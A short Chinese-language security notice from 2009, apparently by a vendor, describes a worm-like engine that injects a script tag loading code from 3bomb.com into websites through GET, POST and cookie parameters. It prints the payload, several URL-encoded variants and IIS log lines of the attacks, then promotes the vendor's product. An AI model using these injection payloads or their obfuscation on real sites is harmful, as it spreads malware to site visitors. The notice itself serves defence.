最近一種新的掛馬引擎開始出現,用GOOGLE搜尋下com/c.js, 約有16,200個網站被掛馬。
最終經過安全傘研究如下:
掛馬引擎通過網頁爬行技術不停的提交掛馬代碼,主要有%D3%AA%D1%F8<script%20src=http://3bomb.%63%6Fm/c.js></script>
中間部分不斷變形
<script%20src=http://3b%6F%6Dbcom/c.js></script>
<script%20src=http://%33bomb.com/c.js></script>
IIS日誌如下:
2009-01-20 09:18:25 W3SVC9 221.130.199.26 GET /xueyuan/list2.aspx name=%b2%df%c2%d4%3cscript+src%3dhttp%3a%2f%2f3b%256F%256Db.com%2fc.js%3e%3c%2fscript%3e 80 - 72.30.142.159 Mozilla/5.0+(compatible;+Yahoo!+Slurp;+http://help.yahoo.com/help/us/ysearch/slurp) 302 0 0
2009-01-20 11:37:41 W3SVC9 221.130.199.26 GET /uploadfiles/debc07d3-3ccb-4676-ad90-144be37027e5.gif<script+src=http:/3bomb.com/c.js></script><script+src=http:/3bomb.com/c.js></script> - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1) 302 0 0
2009-01-20 11:37:41 W3SVC9 221.130.199.26 GET /uploadfiles/0a5d18e3-3018-47a2-ac57-99909ce5c58a.gif<script+src=http:/3bomb.com/c.js></script><script+src=http:/3bomb.com/c.js></script> - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1) 302 0 0
2009-01-20 11:37:41 W3SVC9 221.130.199.26 GET /xcg/images/top_search.jpg - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1) 200 0 0
2009-01-20 11:37:41 W3SVC9 221.130.199.26 GET /uploadfiles/new_34528523.jpg - 80 - 116.5.162.127 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1) 200 0 0
2009-01-20 11:37:41 W3SVC9 221.130.199.26 GET /uploadfiles/510be59b-07fd-4868-87b7-d3cbc677f3a7.gif<script+src=http:/3bomb.com/c.js></script><script+src=http:/3bomb.com/c.js></script> - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1) 302 0 0
2009-01-20 11:37:42 W3SVC9 221.130.199.26 GET /uploadfiles/86181994-719e-440e-abc6-2e7e834b3ebc.gif<script+src=http:/3bomb.com/c.js></script><script+src=http:/3bomb.com/c.js></script> - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1) 302 0 0
2009-01-20 11:37:42 W3SVC9 221.130.199.26 GET /uploadfiles/2e60e9fe-1fa1-495d-8a64-d21a73ec1099.gif<script+src=http:/3bomb.com/c.js></script><script+src=http:/3bomb.com/c.js></script> - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1) 302 0 0
2009-01-20 11:37:42 W3SVC9 221.130.199.26 GET /uploadfiles/db7ed03e-0308-4a0f-9e82-86552f350f2f.gif<script+src=http:/3bomb.com/c.js></script><script+src=http:/3bomb.com/c.js></script> - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1) 302 0 0
2009-01-20 11:37:42 W3SVC9 221.130.199.26 GET /uploadfiles/221d7e7d-2e21-4cb2-a496-1c7627f200f9.gif<script+src=http:/3bomb.com/c.js></script><script+src=http:/3bomb.com/c.js></script> - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1) 302 0 0
2009-01-20 11:37:42 W3SVC9 221.130.199.26 GET /uploadfiles/e9928c0c-d27f-45ba-b873-09bbde17f58e.gif<script+src=http:/3bomb.com/c.js></script><script+src=http:/3bomb.com/c.js></script> - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1) 302 0 0
2009-01-20 11:37:42 W3SVC9 221.130.199.26 GET /uploadfiles/10364b4a-5dde-4d6d-a9e7-17efaf3983d4.gif<script+src=http:/3bomb.com/c.js></script><script+src=http:/3bomb.com/c.js></script> - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1) 302 0 0
2009-01-20 21:07:14 W3SVC9 221.130.199.26 GET /food/List.aspx Title=%BD%A1%BF%B5<script%20src=http://3b%6F%6Db.com/c.js></script><script%20src=http://%33bomb.com/c.js></script> 80 - 202.160.179.83 Mozilla/5.0+(compatible;+Yahoo!+Slurp+China;+http://misc.yahoo.com.cn/help.html) 302 0 0
該木馬通過Cookie,GET,POST注入掛馬,使用搜尋引擎自動尋找並注入網站,有點蠕蟲的性質。
安全傘2009企業版可以有效解決類似變相注入問題
官方下載:http://safe3wp.safe3.com.cn/download.htm
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
